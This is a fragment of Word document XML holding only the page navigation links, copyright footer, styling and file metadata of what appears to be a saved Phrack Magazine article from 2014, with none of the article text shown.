libraries from working, while stopping the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presented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exploits. Yet, this fixes only one possible usage of function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chaining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On the other hand, deploying PaX (especially when backed by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segvguard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can make the successful exploitation much more difficult, in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some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cases even impossible. When (if) PaX becomes more stable, it will be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wise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to use it, simply as another layer of defense.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7.5 - The versions used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I have tested the sample code with the following versions of patches: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pax-linux-2.4.16.patch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kNoX-2.2.20-pre6.tar.gz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rsx.tar.gz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for kernel 2.4.5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You may test the code on any vanilla 2.4.x kernel as well. Due to some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optimisations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the code will not run on 2.2.x.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8 - Referenced publications and projects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[1] Aleph One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article in phrack 49 that everybody quotes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[2] Solar Designer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"Getting around non-executable stack (and fix)"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http://www.securityfocus.com/archive/1/7480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[3] Rafal Wojtczuk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"Defeating Solar Designer non-executable stack patch"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http://www.securityfocus.com/archive/1/8470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[4] John McDonald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"Defeating Solaris/SPARC Non-Executable Stack Protection"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http://www.securityfocus.com/archive/1/12734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[5] Tim Newsham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"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non-exec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stack"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http://www.securityfocus.com/archive/1/58864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[6] Gerardo Richarte, "Re: Future of buffer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overflows ?"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http://www.securityfocus.com/archive/1/142683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[7] PaX team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PaX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http://pageexec.virtualave.net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[8]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segvguard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ftp://ftp.pl.openwall.com/misc/segvguard/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[9] ELF specification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http://fileformat.virtualave.net/programm/elf11g.zip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[10] Paul Starzetz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Runtime addressSpace Extender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http://www.ihaquer.com/software/rsx/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[11] Wojciech Purczynski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kNoX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http://cliph.linux.pl/knox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[12]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grugq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"Cheating the ELF"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http://hcunix.7350.org/grugq/doc/subversiveld.pdf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&lt;++&gt; phrack-nergal/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README.code !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35fb8b53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The advanced return-into-lib(c) exploits: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    PaX case study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Comments on the sample exploit code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Nergal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First, you have to prepare the sample vulnerable programs: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gcc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-o vuln.omit -fomit-frame-pointer vuln.c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gcc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-o vuln vuln.c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gcc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-o pax pax.c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You may strip the binaries if you wish.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I. ex-move.c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~~~~~~~~~~~~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At the top of ex-move.c, there are definitions for LIBC, STRCPY,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MMAP, POPSTACK, POPNUM, PLAIN_RET, FRAMES constants. You have to correct them.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MMAP_START can be left untouched.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1) LIBC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[nergal@behemoth pax]$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ldd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./vuln.omit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libc.so.6 =&gt; /lib/libc.so.6 (0x4001e000) &lt;- this is our address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/lib/ld-linux.so.2 =&gt; /lib/ld-linux.so.2 (0x40000000)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2) STRCPY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[nergal@behemoth pax]$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objdump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-T vuln.omit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vuln.omit:     file format elf32-i386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DYNAMIC SYMBOL TABLE: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08048348  w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DF *UND*  00000081  GLIBC_2.0   __register_frame_info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08048358      DF *UND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  0000010c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GLIBC_2.0   getenv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08048368  w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DF *UND*  000000ac  GLIBC_2.0   __deregister_frame_info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08048378      DF *UND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  000000e0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GLIBC_2.0   __libc_start_main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08048388  w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DF *UND*  00000091  GLIBC_2.1.3 __cxa_finalize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08048530 g    DO .rodata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00000004  Base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_IO_stdin_used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00000000  w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D  *UND*  00000000              __gmon_start__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08048398      DF *UND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  00000030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GLIBC_2.0   strcpy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^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|---- this is the address we seek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3) MMAP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[nergal@behemoth pax]$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objdump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-T /lib/libc.so.6 | grep mmap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000daf10  w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DF .text  0000003a  GLIBC_2.0   mmap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000db050  w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DF .text  000000a0  GLIBC_2.1   mmap64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 address we need is 000daf10, then.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4) POPSTACK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We have to find "add $imm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,%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esp" followed by "ret". We must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disassemble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vuln.omit with the command "objdump --disassemble ./vuln.omit".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 simplify, we can use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[nergal@behemoth pax]$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objdump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--disassemble ./vuln.omit |grep -B 1 ret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...some crap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80484be:       83 c4 2c                add    $0x2c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,%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esp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80484c1:       c3                      ret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80484fe:       5d                      pop    %ebp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80484ff:       c3                      ret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...more crap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We have found the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esp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moving instructions at 0x80484be.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5) POPNUM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This is the amount of bytes which are added to %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esp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 POPSTACK.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 the previous example, it was 0x2c.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6) PLAIN_RET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 address of a "ret" instruction. As we can see in the disassembler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output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there is one at 0x80484c1.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7) FRAMES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Now, the tough part. We have to find the %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esp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value just after the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overflow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(our overflow payload will be there). So, we will make vuln.omit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dump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core (alternatively, we could trace it with a debugger). Having adjusted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all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previous #defines, we run ex-move with a "testing" argument, which will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0x5060708 into saved %eip.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[nergal@behemoth pax]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$ ./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ex-move testing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Segmentation fault (core dumped)          &lt;- all OK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[nergal@behemoth pax]$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gdb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./vuln.omit core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no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debugging symbols found)...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Core was generated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by ./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vuln.omit'.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Program terminated with signal 11, Segmentation fault.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  0x5060708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 ?? ()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If in the %eip there is other value than 0x5060708, this means that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have to align our overflow payload. If necessary, "scratch" array in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"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ov" should be re-sized.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gdb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info regi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...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esp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0xbffffde0       0xbffffde0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...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The last value we need is 0xbffffde0.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II. ex-frame.c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~~~~~~~~~~~~~~ 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Again LIBC, STRCPY, MMAP, LEAVERET and FRAMES must be adjusted. LIBC,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STRCPY, MMAP and FRAMES should be determined in exactly the same way like in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case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of ex-move.c.  LEAVERET should be the address of a "leave; ret"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sequence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we can find it with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[nergal@behemoth pax]$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objdump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--disassemble vuln|grep leave -A 1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objdump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vuln: no symbols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8048335:       c9                      leave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8048336:       c3                      ret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80484bd:       c9                      leave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80484be:       c3                      ret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8048518:       c9                      leave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8048519:       c3                      ret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So, we may use 0x80484bd for our purposes.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III. dl-resolve.c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~~~~~~~~~~~~~~~~~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We have to adjust STRTAB, SYMTAB, JMPREL, VERSYM and PLT_SECTION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defines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. As they refer to dl-resolve binary itself, we have to compile it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twice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with the same compiler options. For the first compilation, we can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#define dummy values. Then, we run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[nergal@behemoth pax]$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objdump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-x dl-resolve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In the output, we see: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[...crap...]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Dynamic Section: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NEEDED      libc.so.6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INIT        0x804839c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FINI        0x80486ec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HASH        0x8048128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STRTAB      0x8048240   (!!!)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SYMTAB      0x8048170   (!!!)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STRSZ       0xa1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SYMENT      0x10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DEBUG       0x0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PLTGOT      0x80497a8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PLTRELSZ    0x48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PLTREL      0x11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JMPREL      0x8048354   (!!!)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REL         0x8048344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RELSZ       0x10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RELENT      0x8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VERNEED     0x8048314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VERNEEDNUM  0x1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VERSYM      0x80482f8   (!!!)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 PLT_SECTION can also be retrieved from "objdump -x" output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[...crap...]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Sections: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Idx Name          Size      VMA       LMA       File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  Algn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0 .interp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00000013  080480f4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080480f4  000000f4  2**0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...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11 .plt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000000a0  080483cc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080483cc  000003cc  2**2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CONTENTS, ALLOC, LOAD, READONLY, CODE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So, we should use 0x080483cc for our purposes. Having adjusted the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defines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you should compile dl-resolve.c again. Then run it under strace. At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end, there should be something like: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old_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mmap(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0xaa011000, 16846848, PROT_READ|PROT_WRITE|PROT_EXEC,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MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0x1011000) = 0xaa011000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exit(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123)                              = ?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As we see,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mmap(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is called, though it was not present in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dl-resolve.c's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PLT. Of course, I could have added the shellcode execution,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this would unnecessarily complicate this proof-of-concept code.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IV.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icebreaker.c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~~~~~~~~~~~~~~~~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Nine #defines have to be adjusted. Most of them have already been explained.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Two remain: FRAMESINDATA and VIND.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1) FRAMESINDATA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This is the location of a static (or malloced) variable where the fake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frames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are copied to. In case of pax.c, we need to find the address of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bigbuf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 array. If the attacked binary was not stripped, it would be easy.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Otherwise, we have to analyse the disassembler output. The "bigbuf" variable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present in the arguments to "strncat" function in pax.x, line 13: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strncat(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bigbuf, ptr, sizeof(bigbuf)-1);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So we may do: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[nergal@behemoth pax]$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objdump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-T pax | grep strncat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0804836c      DF *UND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  0000009e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GLIBC_2.0   strncat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[nergal@behemoth pax]$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objdump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-d pax|grep 804836c -B 3  &lt;- _not_ 0804836c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objdump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pax: no symbols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8048362:       ff 25 c8 95 04 08       jmp    *0x80495c8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8048368:       00 00                   add    %al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%eax)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804836a:       00 00                   add    %al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%eax)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804836c:       ff 25 cc 95 04 08       jmp    *0x80495cc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80484e5:       68 ff 03 00 00          push   $0x3ff           &lt;- 1023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80484ea:       ff 75 e4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pushl  0xffffffe4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(%ebp) &lt;- ptr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80484ed:       68 c0 9a 04 08          push   $0x8049ac0       &lt;- bigbuf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80484f2:       e8 75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ff ff          call   0x804836c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So, the address of bigbuf is 0x8049ac0.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2) VIND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As mentioned in the phrack article, we have to determine [lowaddr, hiaddr]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bounds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then search for a null short int in the interval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[VERSYM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low_addr-SYMTAB)/8, VERSYM+(hi_addr-SYMTAB)/8].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[nergal@behemoth pax]$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gdb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./icebreaker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gdb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set args testing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gdb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r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Starting program: /home/nergal/pax/./icebreaker testing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Program received signal SIGTRAP, Trace/breakpoint trap.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Cannot remove breakpoints because program is no longer writable.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 might be running in another process.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Further execution is probably impossible.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0x4ffb7d30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 ??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()      &lt;- icebreaker executed pax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gdb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Continuing.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Program received signal SIGSEGV, Segmentation fault.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Cannot remove breakpoints because program is no longer writable.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 might be running in another process.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Further execution is probably impossible.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0x5060708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 ??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()      &lt;- pax has segfaulted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(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gdb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shell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[nergal@behemoth pax]$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ax | grep pax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1419 pts/0    T      0:00 pax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[nergal@behemoth pax]$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/proc/1419/maps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08048000-08049000 r-xp 00000000 03:45 100958     /home/nergal/pax/pax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08049000-0804a000 rw-p 00000000 03:45 100958     /home/nergal/pax/pax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^^^^^^^^^^^^^^^^^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^^^^^^^^^^^^^^^^^ here are our lowaddr, hiaddr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4ffb6000-4ffcc000 r-xp 00000000 03:45 107760     /lib/ld-2.1.92.so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4ffcc000-4ffcd000 rw-p 00015000 03:45 107760     /lib/ld-2.1.92.so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4ffcd000-4ffce000 rw-p 00000000 00:00 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4ffd4000-500ef000 r-xp 00000000 03:45 107767     /lib/libc-2.1.92.so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500ef000-500f5000 rw-p 0011a000 03:45 107767     /lib/libc-2.1.92.so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500f5000-500f9000 rw-p 00000000 00:00 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bfff6000-bfff8000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rw-p fffff000 00:00 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[nergal@behemoth pax]$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exit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exit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gdb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printf "0x%x\n", 0x80482a8+(0x08049000-0x8048164)/8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0x804847b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gdb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printf "0x%x\n", 0x80482a8+(0x0804a000-0x8048164)/8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0x804867b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/* so, we search for a null short in [0x804847b, 0x804867b]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gdb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printf "0x%x\n", 0x804867b-0x804847b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0x200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gdb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x/256hx 0x804847b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...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lot of beautiful 0000 in there...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Now read the section 6.2 in the phrack article, or just try a few of the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addresses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found.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&lt;--&gt;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&lt;++&gt; phrack-nergal/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vuln.c !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a951b08a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&lt;stdlib.h&gt;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&lt;string.h&gt;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main(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 argc, char ** argv)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buf[16];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* ptr = getenv("LNG");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(ptr)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buf,ptr);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&lt;--&gt;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&lt;++&gt; phrack-nergal/ex-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move.c !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81bb65d0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/* by Nergal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&lt;stdio.h&gt;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&lt;stddef.h&gt;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&lt;sys/mman.h&gt;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LIBC             0x4001e000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STRCPY           0x08048398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MMAP             (0x000daf10+LIBC)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POPSTACK         0x80484be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PLAIN_RET        0x80484c1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POPNUM           0x2c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FRAMES           0xbffffde0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MMAP_START       0xaa011000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hellcode[] =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"\x90"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"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80"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"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"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"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"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"\x80\xe8\xdc\xff\xff\xff/bin/sh";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/*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This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is a stack frame of a function which takes two arguments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two_arg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func;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leave_ret;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param1;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param2;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mmap_args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func;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leave_ret;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start;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length;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prot;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flags;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fd;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offset;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/*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beginning of our overflow payload.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Consumes the buffer space and overwrites %eip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ov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scratch[28];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eip;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/*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second part ot the payload. Four functions will be called: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strcpy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strcpy, mmap, strcpy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ourbuf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two_arg zero1;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pad1[8 + POPNUM - sizeof(struct two_arg)];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two_arg zero2;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pad2[8 + POPNUM - sizeof(struct two_arg)];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mmap_args mymmap;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pad3[8 + POPNUM - sizeof(struct mmap_args)];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two_arg trans;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hell[sizeof(hellcode)];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PTR_TO_NULL (FRAMES+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sizeof(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ourbuf))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//#define PTR_TO_NULL 0x80484a7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main(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 argc, char **argv)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lg[sizeof(struct ov) + sizeof(struct ourbuf) + 4 + 1];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*env[2] = { lg, 0 };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ourbuf thebuf;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ov theov;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memset(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theov.scratch, 'X', sizeof(theov.scratch));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(argc == 2 &amp;&amp; !strcmp("testing", argv[1]))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(i = 0; i &lt; sizeof(theov.scratch); i++)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theov.scratch[i] = i + 0x10;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theov.eip = 0x05060708;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 else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/*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make the code easier to read, we initially return into "ret". This will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return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into the address at the beginning of our "zero1" struct.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theov.eip = PLAIN_RET;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memset(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&amp;thebuf, 'Y', sizeof(thebuf));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thebuf.zero1.func = STRCPY;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thebuf.zero1.leave_ret = POPSTACK;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/*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following assignment puts into "param1" the address of the least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significant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byte of the "offset" field of "mmap_args" structure. This byte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will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be nullified by the strcpy call. */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thebuf.zero1.param1 = FRAMES +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ourbuf, mymmap) +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mmap_args, offset);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thebuf.zero1.param2 = PTR_TO_NULL;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thebuf.zero2.func = STRCPY;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thebuf.zero2.leave_ret = POPSTACK;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/*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Also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the "start" field must be the multiple of page. We have to nullify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least significant byte with a strcpy call. */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thebuf.zero2.param1 = FRAMES +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ourbuf, mymmap) +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mmap_args, start);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thebuf.zero2.param2 = PTR_TO_NULL;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thebuf.mymmap.func = MMAP;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thebuf.mymmap.leave_ret = POPSTACK;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thebuf.mymmap.start = MMAP_START + 1;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thebuf.mymmap.length = 0x01020304;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/*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Luckily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2.4.x kernels care only for the lowest byte of "prot", so we may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non-zero junk in the other bytes. 2.2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.x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kernels are more picky; in such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case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we would need more zeroing.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thebuf.mymmap.prot =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0x01010100 | PROT_EXEC | PROT_READ | PROT_WRITE;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/* Same as above. Be careful not to include MAP_GROWS_DOWN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thebuf.mymmap.flags =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0x01010200 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS;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thebuf.mymmap.fd = 0xffffffff;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thebuf.mymmap.offset = 0x01021001;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/*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final "strcpy" call will copy the shellcode into the freshly mmapped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area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at MMAP_START. Then, it will return not anymore into POPSTACK, but at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MMAP_START+1.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thebuf.trans.func = STRCPY;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thebuf.trans.leave_ret = MMAP_START + 1;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thebuf.trans.param1 = MMAP_START + 1;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thebuf.trans.param2 = FRAMES +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ourbuf, hell);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memset(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thebuf.hell, 'x', sizeof(thebuf.hell));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strncpy(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thebuf.hell, hellcode, strlen(hellcode));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lg, "LNG=");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memcpy(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lg + 4, &amp;theov, sizeof(theov));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memcpy(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lg + 4 + sizeof(theov), &amp;thebuf, sizeof(thebuf));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lg[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 + sizeof(thebuf) + sizeof(theov)] = 0;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(sizeof(struct ov) + sizeof(struct ourbuf) + 4 != strlen(lg))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fprintf(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stderr,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"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size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=%i len=%i; zero(s) in the payload, correct it.\n",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sizeof(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ov) + sizeof(struct ourbuf) + 4,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strlen(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lg));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exit(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execle(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"./vuln.omit", "./vuln.omit", 0, env, 0);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&lt;--&gt;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&lt;++&gt; phrack-nergal/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pax.c !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af6a33c4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&lt;stdlib.h&gt;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&lt;string.h&gt;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spare[1024];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bigbuf[1024];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main(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 argc, char ** argv)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buf[16];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* ptr=getenv("STR");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ab/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(ptr)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bigbuf[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0]=0;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strncat(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bigbuf, ptr, sizeof(bigbuf)-1);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ptr=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getenv("LNG");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(ptr)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buf, ptr);</w:t>
      </w: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&lt;--&gt;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&lt;++&gt; phrack-nergal/ex-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frame.c !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a3f70c5e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/* by Nergal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&lt;stdio.h&gt;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&lt;stddef.h&gt;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&lt;sys/mman.h&gt;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LIBC        0x4001e000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STRCPY      0x08048398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MMAP        (0x000daf10+LIBC)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LEAVERET    0x80484bd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FRAMES      0xbffffe30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MMAP_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  0xaa011000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hellcode[] =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"\x90"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"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80"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"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"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"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"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"\x80\xe8\xdc\xff\xff\xff/bin/sh";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/* See the comments in ex-move.c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two_arg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new_ebp;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func;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leave_ret;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param1;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param2;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mmap_args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new_ebp;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func;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leave_ret;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start;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length;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prot;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flags;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fd;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offset;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ov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scratch[24];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ebp;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eip;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ourbuf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two_arg zero1;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two_arg zero2;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mmap_args mymmap;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two_arg trans;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hell[sizeof(hellcode)];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PTR_TO_NULL (FRAMES+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sizeof(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ourbuf))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main(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 argc, char **argv)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lg[sizeof(struct ov) + sizeof(struct ourbuf) + 4 + 1];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*env[2] = { lg, 0 };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ourbuf thebuf;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ov theov;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memset(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theov.scratch, 'X', sizeof(theov.scratch));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(argc == 2 &amp;&amp; !strcmp("testing", argv[1]))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(i = 0; i &lt; sizeof(theov.scratch); i++)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theov.scratch[i] = i + 0x10;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theov.ebp = 0x01020304;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theov.eip = 0x05060708;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 else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theov.ebp = FRAMES;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theov.eip = LEAVERET;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thebuf.zero1.new_ebp = FRAMES +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ourbuf, zero2);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thebuf.zero1.func = STRCPY;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thebuf.zero1.leave_ret = LEAVERET;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thebuf.zero1.param1 = FRAMES +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ourbuf, mymmap) +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mmap_args, offset);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thebuf.zero1.param2 = PTR_TO_NULL;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thebuf.zero2.new_ebp = FRAMES +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ourbuf, mymmap);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thebuf.zero2.func = STRCPY;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thebuf.zero2.leave_ret = LEAVERET;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thebuf.zero2.param1 = FRAMES +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ourbuf, mymmap) +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mmap_args, start);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thebuf.zero2.param2 = PTR_TO_NULL;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thebuf.mymmap.new_ebp = FRAMES +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ourbuf, trans);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thebuf.mymmap.func = MMAP;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thebuf.mymmap.leave_ret = LEAVERET;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thebuf.mymmap.start = MMAP_START + 1;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thebuf.mymmap.length = 0x01020304;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thebuf.mymmap.prot =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0x01010100 | PROT_EXEC | PROT_READ | PROT_WRITE;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/* again, careful not to include MAP_GROWS_DOWN below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thebuf.mymmap.flags =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0x01010200 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS;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thebuf.mymmap.fd = 0xffffffff;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thebuf.mymmap.offset = 0x01021001;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thebuf.trans.new_ebp = 0x01020304;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thebuf.trans.func = STRCPY;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thebuf.trans.leave_ret = MMAP_START + 1;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thebuf.trans.param1 = MMAP_START + 1;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thebuf.trans.param2 = FRAMES +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ourbuf, hell);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memset(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thebuf.hell, 'x', sizeof(thebuf.hell));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strncpy(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thebuf.hell, hellcode, strlen(hellcode));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lg, "LNG=");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memcpy(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lg + 4, &amp;theov, sizeof(theov));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memcpy(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lg + 4 + sizeof(theov), &amp;thebuf, sizeof(thebuf));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lg[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 + sizeof(thebuf) + sizeof(theov)] = 0;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(sizeof(struct ov) + sizeof(struct ourbuf) + 4 != strlen(lg))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fprintf(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stderr,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"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size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=%i len=%i; zero(s) in the payload, correct it.\n",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sizeof(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ov) + sizeof(struct ourbuf) + 4,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strlen(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lg));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exit(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execle(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"./vuln", "./vuln", 0, env, 0);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&lt;--&gt;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&lt;++&gt; phrack-nergal/dl-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resolve.c !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d5fc32b7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/* by Nergal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&lt;stdlib.h&gt;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&lt;elf.h&gt;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&lt;stdio.h&gt;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#include &lt;string.h&gt;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STRTAB 0x8048240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SYMTAB 0x8048170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JMPREL 0x8048354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VERSYM 0x80482f8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PLT_SECTION "0x080483cc"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void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graceful_exit()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exit(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123);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void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doit(int offset)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res;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__asm__ volatile ("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pushl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$0x01011000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pushl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$0xffffffff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pushl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$0x00000032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pushl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$0x00000007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pushl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$0x01011000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pushl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$0xaa011000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pushl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%%ebx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pushl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%%eax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pushl $" PLT_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SECTION "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:"=a"(res)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:"0"(offset),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"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"(graceful_exit)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/* this must be global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Elf32_Rel reloc;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ANYTHING 0xfe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RQSIZE 60000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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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main(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 argc, char **argv)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reloc_offset;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real_index;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symbol_name[16];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dummy_writable_int;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*tmp = malloc(RQSIZE);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Elf32_Sym *sym;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short *null_short = (unsigned short*) tmp;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/* create a null index into VERSYM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*null_short = 0;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real_index = ((unsigned int) null_short - VERSYM) /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sizeof(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*null_short);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sym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(Elf32_Sym *)(real_index * sizeof(*sym) + SYMTAB);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((unsigned int) sym &gt; (unsigned int) tmp + RQSIZE)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fprintf(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stderr,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"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mmap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symbol entry is too far, increase RQSIZE\n");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exit(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symbol_name, "mmap");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sym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-&gt;st_name = (unsigned int) symbol_name - (unsigned int) STRTAB;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sym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-&gt;st_value = (unsigned int) &amp;dummy_writable_int;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sym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-&gt;st_size = ANYTHING;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sym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-&gt;st_info = ANYTHING;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sym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-&gt;st_other = ANYTHING &amp; ~3;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sym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-&gt;st_shndx = ANYTHING;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reloc_offset = (unsigned int) (&amp;reloc) - JMPREL;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reloc.r_info = R_386_JMP_SLOT + real_index*256;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reloc.r_offset = (unsigned int) &amp;dummy_writable_int;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doit(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reloc_offset);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printf(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"not reached\n");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return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0;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&lt;--&gt;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&lt;++&gt; phrack-nergal/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icebreaker.c !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19d7ec6d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/* by Nergal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&lt;stdio.h&gt;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&lt;stddef.h&gt;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&lt;sys/mman.h&gt;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&lt;string.h&gt;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&lt;unistd.h&gt;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#include &lt;stdlib.h&gt;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STRCPY          0x080483cc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LEAVERET        0x08048359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FRAMESINDATA    0x08049ac0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STRTAB          0x8048204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SYMTAB          0x8048164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JMPREL          0x80482f4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VERSYM          0x80482a8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PLT             0x0804835c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VIND            0x804859b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MMAP_START      0xaa011000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hellcode[] =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"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80"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"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"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"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"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"\x80\xe8\xdc\xff\xff\xff/bin/sh";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/*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Unfortunately, if mmap_string = "mmap", accidentaly there appears a "0" in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our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payload. So, we shift the name by 1 (one 'x').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NAME_ADD_OFF 1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mmap_string[] = "xmmap";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two_arg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new_ebp;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func;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leave_ret;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param1;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param2;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mmap_plt_args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new_ebp;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put_plt_here;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reloc_offset;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leave_ret;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start;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length;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prot;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flags;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fd;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offset;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my_elf_rel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r_offset;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r_info;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my_elf_sym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st_name;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st_value;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st_size;        /* Symbol size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char st_info;        /* Symbol type and binding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char st_other;        /* ELF spec say: No defined meaning, 0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short st_shndx;        /* Section index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ourbuf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two_arg reloc;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two_arg zero[8];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mmap_plt_args mymmap;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two_arg trans;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hell[sizeof(hellcode)];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my_elf_rel r;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my_elf_sym sym;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mmapname[sizeof(mmap_string)];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ov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scratch[24];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ebp;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eip;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PTR_TO_NULL (VIND+1)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/* this functions prepares strcpy frame so that the strcpy call will zero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byte at "addr"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void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fix_zero(struct ourbuf *b, unsigned int addr, int idx)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-&gt;zero[idx].new_ebp = FRAMESINDATA +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zero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+ sizeof(struct two_arg) * (idx + 1);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-&gt;zero[idx].func = STRCPY;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-&gt;zero[idx].leave_ret = LEAVERET;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-&gt;zero[idx].param1 = addr;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-&gt;zero[idx].param2 = PTR_TO_NULL;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/* this function checks if the byte at position "offset" is zero; if so,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prepare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 strcpy frame to nullify it; else, prepare a strcpy frame to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nullify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some secure, unused location */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void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setup_zero(struct ourbuf *b, unsigned int offset, int zeronum)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*ptr = (char *) b;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(!ptr[offset])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fprintf(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stderr, "fixing zero at %i(off=%i)\n", zeronum,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ptr[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offset] = 0xff;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fix_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zero(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b, FRAMESINDATA + offset, zeronum);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 else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fix_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zero(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b, FRAMESINDATA + sizeof(struct ourbuf) + 4,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zeronum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/* same as above, but prepare to nullify a byte not in our payload, but at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absolute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address abs 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void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setup_zero_abs(struct ourbuf *b, unsigned char *addr, int offset,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zeronum)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*ptr = (char *) b;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(!ptr[offset])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fprintf(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stderr, "fixing abs zero at %i(off=%i)\n", zeronum,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ptr[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offset] = 0xff;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fix_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zero(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b, (unsigned int) addr, zeronum);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 else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fix_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zero(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b, FRAMESINDATA + sizeof(struct ourbuf) + 4,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zeronum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main(int argc, char **argv)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lng[sizeof(struct ov) + 4 + 1];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str[sizeof(struct ourbuf) + 4 + 1];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*env[3] = { lng, str, 0 };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ourbuf thebuf;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ov theov;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unsigned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 real_index, mysym, reloc_offset;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memset(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theov.scratch, 'X', sizeof(theov.scratch));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(argc == 2 &amp;&amp; !strcmp("testing", argv[1]))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(i = 0; i &lt; sizeof(theov.scratch); i++)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theov.scratch[i] = i + 0x10;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theov.ebp = 0x01020304;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theov.eip = 0x05060708;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 else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theov.ebp = FRAMESINDATA;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theov.eip = LEAVERET;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lng, "LNG=");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memcpy(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lng + 4, &amp;theov, sizeof(theov));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lng[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 + sizeof(theov)] = 0;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memset(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&amp;thebuf, 'A', sizeof(thebuf));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real_index = (VIND - VERSYM) / 2;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mysym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SYMTAB + 16 * real_index;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fprintf(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stderr, "mysym=0x%x\n", mysym);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(mysym &gt; FRAMESINDATA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&amp;&amp; mysym &lt; FRAMESINDATA +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sizeof(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ourbuf) + 16)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fprintf(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stderr,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"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syment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intersects our payload;"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"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choose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another VIND or FRAMESINDATA\n");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exit(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reloc_offset = FRAMESINDATA +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ourbuf, r) - JMPREL;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/*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This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strcpy call will relocate my_elf_sym from our payload to a fixed,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appropriate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location (mysym)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thebuf.reloc.new_ebp =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FRAMESINDATA +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ourbuf, zero);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thebuf.reloc.func = STRCPY;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thebuf.reloc.leave_ret = LEAVERET;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thebuf.reloc.param1 = mysym;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thebuf.reloc.param2 = FRAMESINDATA +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ourbuf, sym);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thebuf.mymmap.new_ebp =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FRAMESINDATA +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ourbuf, trans);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thebuf.mymmap.put_plt_here = PLT;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thebuf.mymmap.reloc_offset = reloc_offset;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thebuf.mymmap.leave_ret = LEAVERET;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thebuf.mymmap.start = MMAP_START;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thebuf.mymmap.length = 0x01020304;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thebuf.mymmap.prot =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0x01010100 | PROT_EXEC | PROT_READ | PROT_WRITE;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thebuf.mymmap.flags =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0x01010000 | MAP_EXECUTABLE | MAP_FIXED | MAP_PRIVATE |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MAP_ANONYMOUS;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thebuf.mymmap.fd = 0xffffffff;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thebuf.mymmap.offset = 0x01021000;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thebuf.trans.new_ebp = 0x01020304;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thebuf.trans.func = STRCPY;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thebuf.trans.leave_ret = MMAP_START + 1;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thebuf.trans.param1 = MMAP_START + 1;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thebuf.trans.param2 = FRAMESINDATA +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ourbuf, hell);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memset(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thebuf.hell, 'x', sizeof(thebuf.hell));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memcpy(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thebuf.hell, hellcode, strlen(hellcode));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thebuf.r.r_info = 7 + 256 * real_index;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thebuf.r.r_offset = FRAMESINDATA +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sizeof(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thebuf) + 4;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thebuf.sym.st_name =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FRAMESINDATA +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struct ourbuf, mmapname)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+ NAME_ADD_OFF- STRTAB;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thebuf.sym.st_value = FRAMESINDATA +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sizeof(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thebuf) + 4;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#define ANYTHING 0xfefefe80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thebuf.sym.st_size = ANYTHING;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thebuf.sym.st_info = (unsigned char) ANYTHING;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thebuf.sym.st_other = ((unsigned char) ANYTHING) &amp; ~3;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thebuf.sym.st_shndx = (unsigned short) ANYTHING;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thebuf.mmapname, mmap_string);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/* setup_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zero[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_abs] functions prepare arguments for strcpy calls, which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are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to nullify certain bytes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*/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setup_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zero(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&amp;thebuf,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struct ourbuf, r) +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my_elf_rel, r_info) + 2, 0);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setup_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zero(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&amp;thebuf,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struct ourbuf, r) +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my_elf_rel, r_info) + 3, 1);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setup_zero_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abs(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&amp;thebuf,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(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*) mysym + offsetof(struct my_elf_sym, st_name) + 2,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struct ourbuf, sym) +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my_elf_sym, st_name) + 2, 2);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setup_zero_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abs(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&amp;thebuf,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(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*) mysym + offsetof(struct my_elf_sym, st_name) + 3,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struct ourbuf, sym) +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my_elf_sym, st_name) + 3, 3);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setup_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zero(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&amp;thebuf,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struct ourbuf, mymmap) +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mmap_plt_args, start), 4);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setup_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zero(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&amp;thebuf,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struct ourbuf, mymmap) +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mmap_plt_args, offset), 5);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setup_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zero(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&amp;thebuf,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struct ourbuf, mymmap) +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mmap_plt_args, reloc_offset) + 2, 6);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setup_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zero(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&amp;thebuf,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struct ourbuf, mymmap) + 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offsetof(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mmap_plt_args, reloc_offset) + 3, 7);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str, "STR=");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memcpy(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 + 4, &amp;thebuf, sizeof(thebuf));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str[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 + sizeof(thebuf)] = 0;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(sizeof(struct ourbuf) + 4 &gt;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strlen(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str) + sizeof(thebuf.mmapname)) {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fprintf(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stderr,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"Zeroes in the payload, sizeof=%d, len=%d, correct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 !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\n",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sizeof(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struct ourbuf) + 4, strlen(str));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fprintf(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stderr, "sizeof thebuf.mmapname=%d\n",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sizeof(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thebuf.mmapname));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exit(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execle(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"./pax", "pax", 0, env, 0);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return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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1;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6A418A" w:rsidRPr="006A418A" w:rsidRDefault="006A418A" w:rsidP="006A4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A41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&lt;--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A418A" w:rsidRPr="006A418A" w:rsidRDefault="006A418A" w:rsidP="006A41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</w:pPr>
      <w:proofErr w:type="gramStart"/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t>[ </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://www.phrack.org/index.html" \o "News" </w:instrText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fldChar w:fldCharType="separate"/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t>News</w:t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fldChar w:fldCharType="end"/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t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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t>[ </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://www.phrack.org/papers/shockwave_memory_disclosure.html" \o "Paper Feed" </w:instrText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fldChar w:fldCharType="separate"/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t>Paper Feed</w:t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fldChar w:fldCharType="end"/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t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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t>[ </w:t>
      </w:r>
